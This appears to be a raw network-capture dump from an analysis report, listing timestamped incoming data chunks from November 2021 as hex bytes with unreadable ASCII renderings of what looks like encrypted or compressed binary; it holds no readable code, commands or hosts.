                                                                                                  2021-11-24 13:17:06 UTC293INData Raw: 71 a6 a5 3d 8a ef a4 87 b9 bb 95 ee 0c 5e 55 e9 13 78 00 44 4d 29 06 19 6c ff 62 2c 28 1d ce 7e c6 5d 14 f6 cf eb b8 bd a7 f2 20 84 f7 80 8f c5 ae a3 7b 90 df 6b e1 d8 f3 b5 5a 36 88 db 6f 51 67 f1 67 5f 8b 66 89 e3 97 9c d9 1e 30 89 e5 0f 13 58 db b0 e6 00 ef 26 e1 29 a9 85 8e 0a de 46 d5 6e d5 07 b3 25 cd 62 9c 8b 3f ac b6 95 97 1d 5b ba 99 7d 04 ff c3 7d 1b f8 c8 04 4b b6 bf 4f f8 21 45 d2 63 d0 73 17 bb 89 a8 78 41 e9 d5 c0 b8 37 f9 40 bc a1 79 0e 9f c8 3e 5c dd ac 59 f0 df f2 ce cc 4a 52 89 d3 1d 09 70 54 7d 9f c2 61 4a 15 e2 77 be bb 03 17 d8 09 79 da 9b d0 dc 85 8e fe e7 54 ec cd e3 77 a6 ba ee 51 22 ee 5a 13 02 e2 c1 e4 dd 4b f3 64 81 40 fc f2 b1 e4 c2 10 40 b6 97 59 23 ce 4d c6 c8 c9 3b 00 2d 9b 82 ec 30 f2 fc 62 ba 10 62 43 46 da 94 60 df 2d 92
                                                                                                  Data Ascii: q=^UxDM)lb,(~] {kZ6oQgg_f0X&)Fn%b?[}}KO!EcsxA7@y>\YJRpT}aJwyTwQ"ZKd@@Y#M;-0bbCF`-
                                                                                                  2021-11-24 13:17:06 UTC294INData Raw: 12 ce 3e 75 70 df 3e d9 af 26 23 56 d2 b7 4a 80 68 64 c0 06 09 7a e9 22 6d 5c a4 ad f3 dd 69 0b 39 23 90 25 30 34 39 8b ef 92 3f 72 7f f2 75 a0 58 4e 1d 5d 27 65 1c bd 8a b2 e1 65 1d 17 1e e3 eb 5c 5f 40 f2 6b 92 60 e0 80 41 eb 37 c9 20 ba 3a 68 0b 50 59 c8 9f d5 1f a7 ee 95 9e 53 50 77 8a ed 66 17 b5 06 2c 69 66 e9 ad 6e c7 36 02 09 ce 2b 3a 18 ab 96 c3 9d 30 5b 68 a3 c3 3b 8f b4 ef 7e c6 cf 34 b6 9f ea b3 31 24 ff f1 ca d1 25 d4 7b d4 02 9b 5c 40 7c 3e f9 24 34 76 d1 23 3d 3f 2b cd ce b6 62 ca f4 10 f3 5b d0 af 75 c1 54 c0 18 54 41 3c fd 0e 40 2c 2b 5e 5f 05 4a d0 f4 f8 54 21 ed ff 40 94 af 7a e3 d1 1b 0a 9f 2f 0e 23 cd a2 b1 40 15 63 b8 95 c1 a6 d2 36 48 9f c1 c6 8a 7e f8 90 fc 97 af a8 1b b0 18 46 0d 0b f7 71 bb c2 13 6e be 5f c0 c4 f3 43 42 89 69 87
                                                                                                  Data Ascii: >up>&#VJhdz"m\i9#%049?ruXN]'ee\_@k`A7 :hPYSPwf,ifn6+:0[h;~41$%{\@|>$4v#=?+b[uTTA<@,+^_JT!@z/#@c6H~Fqn_CBi
                                                                                                  2021-11-24 13:17:06 UTC296INData Raw: 23 ff 73 b2 e1 cf b9 3a 6c 76 42 a1 f1 27 97 2c f4 76 b8 43 be 3f cb 0c 97 0b 72 eb 9a 3e 74 5f e5 dc e4 1e 66 6b 11 02 b8 c4 3b 4a a6 35 f5 5c 3c d7 39 29 d7 2f 45 d9 49 0b 6a 1c 20 67 df 3c 32 79 c6 07 62 13 04 d4 6d 27 1c 80 f6 01 00 39 ed 9a 53 bc e2 17 61 e1 64 48 db 8e 6c 15 9d 19 c2 ba 25 a5 19 ec 01 af 1a 6e b7 01 eb e2 22 3c 12 10 73 b0 79 4b 64 cf 01 ca 88 80 10 c5 77 62 9f 1e 36 88 e9 4c 6f 95 e5 d1 ab f2 a0 8c ec 0d 0c 7c 62 22 49 ec 10 34 b6 8d 87 88 81 57 cf 7f 21 a2 57 10 82 f2 05 ac 6d 4b 92 d8 a2 a2 13 2d de 30 f6 36 0b ec 18 a7 b5 c8 74 9e 3c 6f 44 35 55 6d e2 30 41 0e a5 84 f6 4f 13 b8 c6 21 ba 8b 14 2e e3 36 d0 bb 48 24 ac 21 62 ad 41 9d c5 86 b6 79 a7 3d 4f 00 3f ae d2 2a 22 42 79 a1 d4 97 82 a7 08 9d 26 ad c5 e5 25 ca c0 e9 6a c5 3c
                                                                                                  Data Ascii: #s:lvB',vC?r>t_fk;J5\<9)/EIj g<2ybm'9SadHl%n"<syKdwb6Lo|b"I4W!WmK-06t<oD5Um0AO!.6H$!bAy=O?*"By&%j<
                                                                                                  2021-11-24 13:17:06 UTC297INData Raw: 72 75 e7 b8 15 6e 05 68 91 a3 4c be 5d b7 49 32 45 bb 12 f7 9d a2 41 61 17 4b be a2 c5 8d 46 18 13 ba c6 7f e5 1d 41 58 62 20 3f 5d 90 7b ec 24 d0 e3 d9 49 60 6e db 46 e5 0b 5c c2 69 85 9d 08 19 53 f4 b0 47 bf fe 93 9e 50 21 0d 0c 60 0b ac 05 b7 47 71 ca f4 73 48 b6 d2 a7 01 3b a9 9d ed 5d 32 e8 b4 9a b7 4c 51 37 27 b5 c9 a2 d7 37 56 9e e3 45 82 a9 65 28 19 0c c9 e8 49 84 34 23 6f e8 80 3d eb f1 08 5e a5 5f 6c 7e 1b 68 e4 39 12 06 ef b8 1f b6 cd 6e 08 33 0d b2 10 69 d2 9a 79 64 c0 d5 97 5c fc a8 1c c1 02 57 9c a9 11 ac 69 e0 5b 9e 7a 2b 93 ac db ec 85 b3 a6 77 ff 54 c7 55 86 17 45 df 53 d2 6d c4 c2 a9 6f 06 66 42 63 45 d2 48 9c 85 86 f8 5c 7e b7 0a fe d7 60 a7 fd d5 b2 eb a8 e8 1b 32 38 2c 45 88 4e ca 3e 71 97 7b 19 ac 3f f0 b7 b8 79 15 a6 81 54 98 ba 9b
                                                                                                  Data Ascii: runhL]I2EAaKFAXb ?]{$I`nF\iSGP!`GqsH;]2LQ7'7VEe(I4#o=^_l~h9n3iyd\Wi[z+wTUESmofBcEH\~`28,EN>q{?yT
                                                                                                  2021-11-24 13:17:06 UTC298INData Raw: d3 74 86 65 6e 15 4a cc 87 81 59 fa 3b ae f7 03 ed b2 dd 84 20 da f6 bc be 84 42 c6 bf 7d e6 94 7d 53 c6 c1 30 4d 44 f9 92 90 6a 9b 93 bf 82 62 c0 dc 0c ab 77 05 41 b3 6b a3 b7 58 60 02 ed 56 89 1a f1 32 7c 73 5e c9 67 62 31 25 6c 24 0b f4 1b 63 3b 54 27 eb 70 b3 8d 17 4a 09 5e 68 b6 24 0c cd a1 b7 7f 08 5a 84 dd ef bd 9f 37 43 66 4d e3 01 a5 a8 8d 34 d7 13 24 69 22 ed 1c 34 51 73 49 71 be ac 38 35 56 26 5c a7 73 a4 9d 3a ef 25 f1 07 3a c5 20 06 9c c4 3c 5b d8 0e e8 34 20 f3 ce 40 8d a6 6d e8 a9 e3 80 27 39 fd 0b 46 ec e6 53 77 77 1f 4a 92 2c 33 1c 0c c7 ef 9e 07 ab 9e 87 48 87 87 a1 21 18 91 16 c0 ad 74 4f 61 c7 7b 28 3a 1f e4 0a 50 44 e3 f7 f8 dc 92 2a 4c 1a 7f b0 9d e7 1f b8 e9 0d 92 60 d4 32 9d 1c 4f 06 d6 04 41 94 21 78 7c 4f 29 20 c9 22 e9 0f 16 47
                                                                                                  Data Ascii: tenJY; B}}S0MDjbwAkX`V2|s^gb1%l$c;T'pJ^h$Z7CfM4$i"4QsIq85V&\s:%: <[4 @m'9FSwwJ,3H!tOa{(:PD*L`2OA!x|O) "G
                                                                                                  2021-11-24 13:17:06 UTC299INData Raw: f5 1a 37 25 e6 03 5e 1d 1e ab 81 fa 93 fa 5e 15 de cf 73 44 42 d4 21 54 71 2a 51 8f 9f 94 99 e0 d8 c7 e2 c4 ce 7b 9d e1 1a 81 3e b1 ec 91 39 6d 8c e0 c1 1f 5c 72 39 fe d9 67 85 f8 9d c5 34 43 b9 4f 0e 14 ca cd ba d5 2a 83 b5 1d f4 05 21 72 f6 2b 2a c0 b2 86 92 bc e8 6e 00 cb 50 db 31 ef b8 d5 5d 0b c6 91 27 e9 86 b0 22 ba 4f d0 9c e9 f3 b0 de 8d b9 d4 5f 8d 7b 57 95 2a 7d 26 b4 5f d2 e7 0c de 07 c1 2e 7c 3d 8f e9 aa ff d8 e0 2b 82 73 b8 f0 f8 ea 9a 1b 3a 1c df b9 0e 04 33 78 97 45 57 41 fd 28 6e e2 12 67 f0 00 77 a8 f3 7a fb 77 07 f1 94 49 d9 d4 4a fb 73 62 62 45 65 bf be 25 3c cb 3d 2f d2 2a f3 a2 e1 7f 86 ef ef 32 17 d0 42 67 64 62 2b c8 4b ed 4a 6c 40 4b 25 e1 16 e8 94 24 1c 8c 0e eb 78 fd 13 a2 ec d7 54 5c 4c b7 4a b1 96 80 be a8 4f 7f 37 55 2d ff 25
                                                                                                  Data Ascii: 7%^^sDB!Tq*Q{>9m\r9g4CO*!r+*nP1]'"O_{W*}&_.|=+s:3xEWA(ngwzwIJsbbEe%<=/*2Bgdb+KJl@K%$xT\LJO7U-%
                                                                                                  2021-11-24 13:17:06 UTC300INData Raw: ec 43 5a e5 af f8 eb 95 a4 04 1e 7e c5 47 34 9e 47 fa 09 98 35 42 4e 39 ce a6 61 36 67 82 ea de 34 8b 52 e4 4b a8 51 b4 b7 44 ef 55 86 7c 72 f5 9e 3b 8c 40 ea c3 5c 31 0c 3e be 26 b6 0c 90 da 99 9c 01 08 af 63 83 99 f1 0f cb d1 8e 59 90 35 56 87 26 f8 84 82 d1 71 9a 79 59 bb fa a3 8b b9 82 a6 89 f9 81 e4 68 8a fc 9b 3e 56 94 31 48 35 72 76 e7 54 cf d2 58 e2 b5 cc c1 e5 f0 cf 0b 71 e8 2c 83 af fa d2 0d e7 06 db 38 f9 91 ec 12 f6 05 e4 cb ec 9a 9c ed 71 98 b3 09 46 89 24 f3 69 c8 9a 25 2d 61 3b b3 69 56 e7 b0 11 74 d1 47 c7 64 1a 3c 21 e0 d6 54 52 6b e0 bb 50 ae 2f 14 c1 f2 eb b0 26 a4 84 09 46 0e aa 2e 24 cd ae a9 20 8f 9a 3c 65 02 56 f6 b2 d3 3a e3 43 1b 57 eb 18 d7 3f a8 94 4c 24 14 1c 01 15 36 f4 71 15 77 22 51 f5 66 fe 08 14 a4 e7 b1 8c 8c 29 ea e6 8b
                                                                                                  Data Ascii: CZ~G4G5BN9a6g4RKQDU|r;@\1>&cY5V&qyYh>V1H5rvTXq,8qF$i%-a;iVtGd<!TRkP/&F.$ <eV:CW?L$6qw"Qf)
                                                                                                  2021-11-24 13:17:06 UTC301INData Raw: ae 78 b7 63 e4 6e 01 f1 e8 d8 53 ce 40 dd 4b 26 39 3d a0 14 9c 13 7a 96 37 0a e2 2c 2e 2c c0 f3 e2 b9 18 26 61 93 84 ab 0e e2 0d 78 a7 36 d9 ce 17 da 22 65 90 8e 7c bd 92 5e c1 b3 17 f2 52 15 8c 9b 82 58 cf 3c 6b 42 b5 80 5b c9 a8 bf 1a 81 c7 c6 27 97 51 b6 5b fb 73 81 2e ab 4f 18 c8 41 d1 18 55 45 19 df 74 ea e4 f7 36 ac 8c ce 3b 81 b6 34 4e 48 7c 61 06 b4 b0 54 a8 b0 24 da 9b 21 92 46 d1 a2 e9 ce c5 d4 35 1a d8 96 14 44 1e 6d a1 ef 88 20 df 5f d0 9c 61 22 4c d9 52 df df a6 99 ac 6b 23 87 ca bf 7b 01 5a 28 12 d5 c4 f0 bd b3 7f c5 29 f9 49 e4 e3 3a a4 a8 e4 2e 03 9a d1 86 7e 4a 29 66 00 8b 86 10 14 57 f3 17 fd d3 56 7c c7 df 7d 7a 7e e0 d8 2d a1 5a 88 90 e6 5a 82 7c 9c 10 05 e3 19 5a 3b 00 93 d8 8c 04 c2 30 e3 b8 c7 68 1c 6d ec d6 7a c7 3b a0 73 84 27 33
                                                                                                  Data Ascii: xcnS@K&9=z7,.,&ax6"e|^RX<kB['Q[s.OAUEt6;4NH|aT$!F5Dm _a"LRk#{Z()I:.~J)fWV|}z~-ZZ|Z;0hmz;s'3
                                                                                                  2021-11-24 13:17:06 UTC303INData Raw: 0a 82 d9 da da 15 d7 22 98 b3 22 1c 4b 79 b6 fb 90 5f 6b f2 9d 80 41 9a 08 9a 12 1f 98 bc 81 ac ae be 3f 69 ae 60 18 69 e7 21 c5 63 91 43 5d 4b b0 e4 6d 70 ac 35 63 2b bb 78 57 bf 3e bc 9e 18 8d b7 f8 5b 0a 98 07 17 8e b5 57 65 dc 3b aa 11 11 30 45 ad 57 45 22 0a a0 c7 6f d6 b4 81 3b de f9 a8 ad c4 ae 3b e9 74 d0 dc 1f ad 5e e6 79 b5 e5 4e 4a a7 37 51 1f 96 07 98 fe 32 12 8f e6 c8 c7 39 31 3c 61 a2 61 ef bb cb 54 46 bd 98 aa b8 14 6a 88 6f 90 1a c2 c6 a7 52 85 1c a8 75 b0 e8 cf 5f 65 87 5d 27 2e bf 9d 68 63 57 84 af cf 70 23 c9 51 df 29 97 c9 b7 ed c1 c1 b8 cd b1 95 12 62 a0 94 14 d3 99 34 d5 cd 2d 55 5d 94 bf 72 2b 22 0e d8 65 fc cc bb 62 8f cc 80 a5 db 52 2d 8e b7 70 25 23 f4 24 b0 cb 8c d6 1c 86 d4 dd b0 b2 14 47 d3 05 76 a1 11 5e c8 f2 47 99 a1 14 df
                                                                                                  Data Ascii: ""Ky_kA?i`i!cC]Kmp5c+xW>[We;0EWE"o;;t^yNJ7Q291<aaTFjoRu_e]'.hcWp#Q)b4-U]r+"ebR-p%#$Gv^G
                                                                                                  2021-11-24 13:17:06 UTC304INData Raw: 17 94 3f c9 b8 58 8b a7 82 98 b7 c7 02 01 e2 09 7a 48 bc df 4f 16 d5 8e 9d 42 70 0d 43 42 0b c4 72 84 13 f5 ed ed f4 7e bb ac 00 1b 26 84 f1 ef 6d 77 a5 a4 7f f8 ee f1 1d 90 5d 60 5a 7e ee 65 87 32 bc 7b ad c4 98 c6 66 d9 03 e8 51 0c 97 4d 2c 93 d0 b2 5f f0 3c 19 cc 13 c8 7f 3a 43 f0 f4 6b 17 37 1a 59 ad ac da a2 e4 13 0a 89 aa e5 44 a0 6d fd a1 c4 84 ac c5 86 2b eb e9 36 4d a6 76 74 66 68 ae e3 03 25 66 db 76 18 3f 8e 52 fe 3f e6 55 6c 17 01 c6 4c 76 24 60 7c 08 b3 1b fa 23 5f fa b7 f2 62 df 13 ae 99 e7 ab bf 08 02 54 f1 aa 18 8a 0c b2 4d 53 69 de 32 db 0e 4a 07 e7 39 1a d5 9b 66 6d 98 c4 af 63 39 31 dc 87 08 a1 ac 02 de 6a e1 27 df b2 15 c3 53 59 7a bf 87 c8 8a 16 ca 73 a8 e5 46 97 a5 b3 99 1e 84 15 31 fa 91 5a ec a4 f9 24 49 1d 4c 03 3f a9 84 e8 a9 b8
                                                                                                  Data Ascii: ?XzHOBpCBr~&mw]`Z~e2{fQM,_<:Ck7YDm+6Mvtfh%fv?R?UlLv$`|#_bTMSi2J9fmc91j'SYzsF1Z$IL?
                                                                                                  2021-11-24 13:17:06 UTC305INData Raw: c6 ec 05 ad 44 24 21 df 81 9f ad e5 78 01 83 27 5e db 6e 93 3b 79 88 fe e2 6c aa bc 81 eb de 21 c0 17 36 24 92 32 93 ef a9 cf 3b bb 05 50 3d b5 63 44 e1 fa 5c de d6 99 98 47 79 fb 48 4e b0 13 79 4e 4f 63 47 9c b3 ef 39 56 a1 f3 eb be c0 18 bf b3 95 39 58 e6 31 2e e9 24 28 e1 da d5 0c cf de b4 64 3a ee 70 f3 5b 5e 72 1d 3f bb 60 ae 5d 7b 88 f3 35 cd c1 06 23 f3 15 e3 38 62 3b e0 cd 29 2c 39 af 5b 1f 8f fc 79 83 c0 2c 98 3a 8d 09 ed 23 2a 8e dc 71 2d ae 87 e2 24 cb f3 50 e7 c6 35 ba 4e 8b 6a 50 a5 d0 a2 53 df c0 55 d3 ab b8 77 ec ff a3 7d 01 5e 95 9f 95 f0 ba cb c6 42 87 da 47 97 f0 4b 9a 37 10 1c 4b 7a 69 9f f8 19 34 25 72 04 39 bd a6 9d 4e e7 6f 4b 18 d0 8f 1c eb 0e eb dd ed 74 e2 39 db b5 3f ba 00 50 a8 3c 41 d0 27 f1 2c 96 61 64 25 73 61 fd 2b 49 0f 71
                                                                                                  Data Ascii: D$!x'^n;yl!6$2;P=cD\GyHNyNOcG9V9X1.$(d:p[^r?`]{5#8b;),9[y,:#*q-$P5NjPSUw}^BGK7Kzi4%r9NoKt9?P<A',ad%sa+Iq
                                                                                                  2021-11-24 13:17:06 UTC307INData Raw: 9e 68 4f 38 03 32 ba cc 1d e3 4c 3e 35 96 66 9f ff 12 46 16 18 c9 11 98 50 46 9c 39 35 98 73 47 02 05 02 91 e9 51 70 68 a4 cd 61 7e 95 e1 08 48 07 05 3b e3 a3 2c 70 50 56 03 48 1d ef 0d ea 62 ee c8 42 06 c7 f3 f7 e8 fa fd 46 fa 0b 48 ef c9 5a b9 75 78 ce 25 db bc ec dc a4 a7 fa e9 dc 4a bf 13 99 1a 41 21 a4 e9 cd 6b 40 9f 6c 52 a0 9c e8 28 0d 45 51 17 48 c1 67 1e 5d c5 47 df 1d 6f fb 42 be e3 28 da 2e 06 25 e8 46 3b e7 29 03 a7 05 92 56 38 61 92 0e 37 59 91 59 64 fe ab 95 6c 4e 55 39 66 99 24 27 3a 42 60 5a 96 1e 0e 96 1c ac 39 5d f8 6f e2 8a 79 30 38 e1 00 8f a8 14 dd 67 77 21 21 72 08 b7 f7 98 e8 2c 0d c6 cb 9b 7b 0d f8 4e 29 0e d0 03 bb ae 55 97 32 87 00 91 ec 0c 30 be 40 fb fc 50 f5 58 6c 1d 87 f5 6c bc 92 93 4d 90 0a 92 17 d9 45 dd cb bd aa 10 35 90
                                                                                                  Data Ascii: hO82L>5fFPF95sGQpha~H;,pPVHbBFHZux%JA!k@lR(EQHg]GoB(.%F;)V8a7YYdlNU9f$':B`Z9]oy08gw!!r,{N)U20@PXllME5
                                                                                                  2021-11-24 13:17:06 UTC308INData Raw: 0e f1 44 04 6b bf 72 42 12 51 4a 92 08 55 26 f3 89 01 3f ad 7b ed 22 e8 e6 8f 99 4c b5 d7 49 0c 51 61 b3 6d 98 7b fc e9 a1 39 01 21 e5 b6 64 d1 2e 34 6d 23 25 58 da 94 f7 af 3a ea 8d c2 ad 90 e3 2b ce b8 dc cc f2 3f 64 be 2c 21 57 e1 86 13 9e 2b c8 85 0e 36 06 1a 59 50 ce eb 3c 66 23 a2 68 72 d1 31 eb b5 41 cf 46 8d 27 7c eb 60 6a 26 4c 09 dc c4 5f f9 37 bb 7d 4b 61 fe c0 99 72 f9 49 b5 9d 39 6b 1c 51 aa 32 b7 c7 6d c2 1a ff 47 80 e4 53 f5 5c a5 31 21 fb 2c cd 67 09 f6 62 f7 9d 16 0c ce f3 4b c0 c1 5c 64 8b e2 bc 80 df a8 2a 93 c3 a1 d3 40 01 b5 b2 f7 61 96 5e 3e 7c cf 03 66 28 9d dc d6 68 06 26 65 34 29 f5 b0 c0 9a 59 71 e3 0a d8 5a ba a7 07 80 65 38 13 2e 36 b6 91 19 c6 4b 70 42 60 c9 93 9c 42 a7 02 87 94 58 61 39 f3 7c db dc 30 08 ec 72 a0 ed 53 cc 35
                                                                                                  Data Ascii: DkrBQJU&?{"LIQam{9!d.4m#%X:+?d,!W+6YP<f#hr1AF'|`j&L_7}KarI9kQ2mGS\1!,gbK\d*@a^>|f(h&e4)YqZe8.6KpB`BXa9|0rS5
                                                                                                  2021-11-24 13:17:06 UTC309INData Raw: 9f 06 af 0f bc eb cb d4 fb 77 15 98 5d dc 13 5f e1 60 d9 5a e4 b2 f9 29 08 c4 12 67 40 0d a2 95 28 cd ed fb d7 71 9b 11 41 0b 9d 96 eb 78 ad 65 6b 92 5d 21 45 3c e6 76 58 91 b2 ef e1 69 70 d3 5e 20 8e 26 41 91 62 05 e6 26 fc d6 be 62 6c 6b 45 db 8c 0d 8a 8e 98 d9 19 b6 7f f7 a0 25 a1 27 9f 7d df 34 fa 41 df b7 c7 78 30 f5 fa 52 ca fa 81 1a 61 43 ab ca c1 29 5a 64 39 ce 63 5e da 5c 78 91 3c 35 26 44 00 31 74 35 79 ce 00 d9 33 ef 11 83 3a 82 be 2b d4 ac 4f 3e ed 69 78 b8 0c 37 b7 0c db 6c 40 6d 06 fe 7a fb d7 0d 1a ef 77 a6 38 f2 e2 62 58 54 b3 87 9c 98 10 fd b1 09 bb 9f 6c 65 94 86 e4 6c 47 f7 d7 c0 eb b8 b4 67 eb 64 ac 26 3c dc b2 02 49 7c f5 71 6e 92 91 a5 78 8b ce 82 98 67 99 24 5f b4 94 7e db 8d ca b7 e3 f3 dd b5 cf 46 11 73 fc e5 4e 02 a0 72 a8 5d 55
                                                                                                  Data Ascii: w]_`Z)g@(qAxek]!E<vXip^ &Ab&blkE%'}4Ax0RaC)Zd9c^\x<5&D1t5y3:+O>ix7l@mzw8bXTlelGgd&<I|qnxg$_~FsNr]U
                                                                                                  2021-11-24 13:17:06 UTC310INData Raw: 88 26 44 ee 44 84 b3 5d 7e 5f a2 1e 32 75 12 a3 53 6f b0 3d 8e 7a 8f b7 d8 04 d3 d3 e5 26 cc ba 9c da 52 6a 2c 36 45 57 c9 b0 10 8b 6f a2 2e 4c d9 aa ee 4c 88 31 1f 9d 54 c0 8a 8b 54 77 19 f9 42 33 4c 10 b4 32 2a 17 14 c5 20 46 d0 93 ac a3 9b f7 b8 6f d6 e8 b1 8a 0b 3a a4 cb 1d 53 d8 3e 4f f0 12 37 6e 5b 74 76 bd 7b cd b3 5e 8d f4 a6 05 90 eb 30 25 a4 68 69 9b 02 f5 21 14 a1 35 92 f2 16 74 9e 8b f5 61 80 de 3f c2 73 0b b9 75 d1 c0 72 13 30 7d 05 17 c1 15 b4 ab 61 9b 8b 23 29 d9 d6 64 69 5b 1e eb 5d ea 5d 29 e9 71 14 13 f5 4c bb 3d 19 52 8c 81 a2 02 2f 5f 80 89 d1 a9 cc 2d 41 fa ae 11 bf f3 e5 d7 7a d8 d1 cc 33 0f 70 2a d1 e5 f5 dc fa a2 04 96 57 0e 21 2d a9 0a ad 01 7d 0f c6 b3 f0 ca c3 29 8d 6f 4d 6c 8e 1c c8 79 3e 89 48 9a e5 0b 2a 93 25 16 e8 a3 f1 cd
                                                                                                  Data Ascii: &DD]~_2uSo=z&Rj,6EWo.LL1TTwB3L2* Fo:S>O7n[tv{^0%hi!5ta?sur0}a#)di[]])qL=R/_-Az3p*W!-})oMly>H*%
                                                                                                  2021-11-24 13:17:06 UTC312INData Raw: 41 d5 6a b1 24 e7 b7 f0 71 a6 70 ce dd f7 41 c9 5b 01 ec ac ad 41 2a 52 87 a7 b8 c0 f3 10 f6 98 93 e9 b7 bd 03 42 ad cb 03 11 72 78 e7 ef 17 c3 18 6b 2c d2 29 03 81 dd bc 84 53 53 ec 20 ac aa 24 90 52 31 80 02 0b f6 e4 f0 1b 69 41 6c ac 2a ed 8f 91 fa 7e 3f cb aa 42 10 de 3d 31 91 51 f0 41 44 c4 64 07 33 b8 5b d4 81 62 f5 c3 8d 15 d8 de 39 81 97 03 fa 53 e5 42 f1 1d c5 05 53 ee b9 88 29 fa be 3f be 09 41 1e 5a 33 08 d1 bc 54 33 e8 56 24 ae 31 75 de d5 4e 9f 78 cf be 4a 0a ae 53 3d b6 1b 7a 16 0a a9 a5 db 22 ae 40 e4 95 bf e6 d0 b9 f9 70 a0 4b a2 d6 6b 56 70 ae 31 43 7c 5e 27 7a e7 6c f1 aa 68 70 2e 3d 2c 87 cb df 3d bd 5c 05 77 8e 1a c6 98 28 f8 05 cf a4 14 ac 83 7f ac e0 d7 c8 9b 7d cd 92 99 8e e5 8c ee 95 d7 dc 4b c0 3b 45 ac 34 ca 3d 76 1e 0c f5 67 d0
                                                                                                  Data Ascii: Aj$qpA[A*RBrxk,)SS $R1iAl*~?B=1QADd3[b9SBS)?AZ3T3V$1uNxJS=z"@pKkVp1C|^'zlhp.=,=\w(}K;E4=vg
                                                                                                  2021-11-24 13:17:06 UTC313INData Raw: 57 83 2d f1 09 69 05 88 b7 4a 28 6c c1 5b d5 82 7a e5 27 9a e5 ac d1 46 5e b9 62 6c d2 33 f1 b0 73 72 e7 dd c7 2e b7 43 12 55 74 e5 b6 74 bb 63 bd ce f6 96 0c f3 b6 65 a9 7f ec 46 92 57 57 a4 a5 8a 05 d9 57 22 f1 7e 7a f5 ee 07 f4 63 6e 78 60 36 1b db 54 fe 1f 9a 22 9b 02 f5 a9 9f 7a 85 36 15 16 1c 3b 24 80 32 37 55 5f 58 d3 13 79 2a e7 d7 d9 a0 e7 54 6b 7d 2f 01 08 ce 59 f5 eb 68 dd e1 d4 15 81 4f 84 54 e7 c8 52 60 e7 1a 65 46 15 1a 62 2e 8d c2 2a 1a 21 6a f7 c4 23 42 0d 2f 87 d5 0b 7a 8f 7e 2d ba 15 bf d2 fc 95 bc 7b 4e 16 10 e0 21 b1 f2 d4 9d e2 e6 a3 c5 9e 1b 4c 9f c4 77 c3 24 98 9f 11 c8 56 e7 b8 74 b8 85 09 cc 05 46 32 63 7e 3e 44 6c d4 23 7d c4 c9 f1 7d b3 f8 6b 45 b6 a2 2c 40 b3 aa 5a 27 28 d8 86 6d 16 8f 15 5f e0 a8 c9 0e af 0a 22 44 ca f4 04 f1
                                                                                                  Data Ascii: W-iJ(l[z'F^bl3sr.CUttceFWWW"~zcnx`6T"z6;$27U_Xy*Tk}/YhOTR`eFb.*!j#B/z~-{N!Lw$VtF2c~>Dl#}}kE,@Z'(m_"D
                                                                                                  2021-11-24 13:17:06 UTC314INData Raw: 6e 2f 5e 03 20 95 7c d5 f5 91 e6 06 b6 c8 94 a2 ac 2d 8f 7d ac 1c c6 23 36 89 e5 17 14 9a 7b 97 38 bf 86 95 05 03 1f 26 60 b4 1d b4 19 96 6c 2e 6a a6 4f f1 b4 5e 97 96 50 42 da 03 c6 5e aa 34 ee d7 aa 75 df 9b 20 1e 0a 24 51 67 38 ea ee 21 3f 59 70 fd ec c9 c6 7f c8 23 3b cc 3b 35 e5 eb 1e f9 b6 75 a8 5c bb 80 90 ba a6 f0 da d5 87 b0 cc c8 cc 2f e7 1a 3d 28 27 ae 09 da 96 99 49 ba f2 ec c5 d1 96 27 9c 9c d6 9d 0f fa 6f bd 18 04 07 65 b8 3c 84 16 ba 2d d4 a7 76 ea d9 a4 8a 90 9d 57 b9 1f 51 37 ee c5 bd f6 53 37 36 7f 23 74 af 13 68 44 f1 3b 14 86 b4 22 c3 6b fd 58 73 79 59 6e 64 b2 55 b2 a0 0e c7 bc e9 e5 4e e6 9d 0b e6 6b b9 6d 67 b2 04 fa be 46 e9 5e 5e 43 84 2f 2a d8 93 00 f4 88 24 2e 09 af 72 14 4c 7c 29 7a 97 f9 ce 08 8e 9d 30 7f 17 93 d3 39 c9 1c a8
                                                                                                  Data Ascii: n/^ |-}#6{8&`l.jO^PB^4u $Qg8!?Yp#;;5u\/=('I'oe<-vWQ7S76#thD;"kXsyYndUNkmgF^^C/*$.rL|)z09
                                                                                                  2021-11-24 13:17:06 UTC315INData Raw: 3a 26 68 86 b0 b5 ad b0 e4 c7 b6 c2 e5 ab 10 64 7e d6 70 bd a5 c5 39 a0 be 45 c5 5a 07 93 a6 47 66 8f d4 68 0b 38 e7 ba a7 66 35 20 29 6c 98 21 b6 e6 a7 a1 df 4c 8b da b4 19 87 79 46 89 f2 64 a8 17 09 0b a7 c0 02 a1 ad 04 8b f8 55 56 9f fd 79 19 8e 28 61 8f 4f c5 32 10 bc 7f 43 29 ab 29 c0 90 16 c0 ee 66 32 1a 01 4e eb c0 a5 41 9c e5 7d b9 5d cb de 38 12 fc 96 8b 62 14 42 b1 e2 e4 bd 75 22 2a c9 19 16 49 e8 6e 8e 44 03 a5 a3 31 c0 aa 62 d8 c0 55 28 31 82 27 2a 66 82 67 30 c3 bf be 5a df 9c b9 92 4a 28 ef e9 52 e3 5d 21 f4 39 b8 5a 90 cd e5 b4 a8 d9 d0 dc 00 26 1e 93 64 b8 03 04 87 5b 72 f3 20 2d f2 b3 6a f8 40 76 30 f3 15 20 3a b1 15 8a 29 88 e2 a5 16 2b df 2e 3f 84 89 4b 45 94 85 dd 06 ae c4 c2 66 cd 70 0e 8e 88 55 d6 10 86 4b 3b a2 04 59 d0 c6 c2 27 a9
                                                                                                  Data Ascii: :&hd~p9EZGfh8f5 )l!LyFdUVy(aO2C))f2NA}]8bBu"*InD1bU(1'*fg0ZJ(R]!9Z&d[r -j@v0 :)+.?KEfpUK;Y'
                                                                                                  2021-11-24 13:17:06 UTC316INData Raw: 14 9e 3e 3f e3 7e d9 0c 07 9e 79 6b 9a 3a ce 38 f9 68 80 10 1c 65 57 21 a4 36 10 66 7c aa fd 78 be 24 f0 e2 0f 4f 92 c7 76 c8 8c 75 26 cf 48 f7 fa 66 2f 47 44 58 c2 4a 48 43 f7 9e 4a d7 5f e4 71 e9 17 d0 75 75 09 12 33 d2 a4 8e 0e 3a 9a 1f cc 25 0c 67 2e f1 02 d0 71 fe 16 59 e7 8b 62 00 aa 9f 43 10 30 45 a2 34 63 b0 7f c1 a4 04 a4 6b 8c 1b ae 46 f7 d9 1a a1 97 2a 20 f0 56 6c 60 31 47 73 ab 0c f6 0e b1 d1 f5 b4 71 3f b3 07 7f d0 95 c5 52 73 d3 e3 65 dd 8b 6f 90 1c 45 b5 67 df 11 8f ce 1e bf 23 1b 37 21 7e 07 86 c7 43 d2 7c c8 db 78 2a 5e 30 1f 51 4e bd e0 9d 18 a7 6f 97 f2 78 3d bc c2 17 73 0f 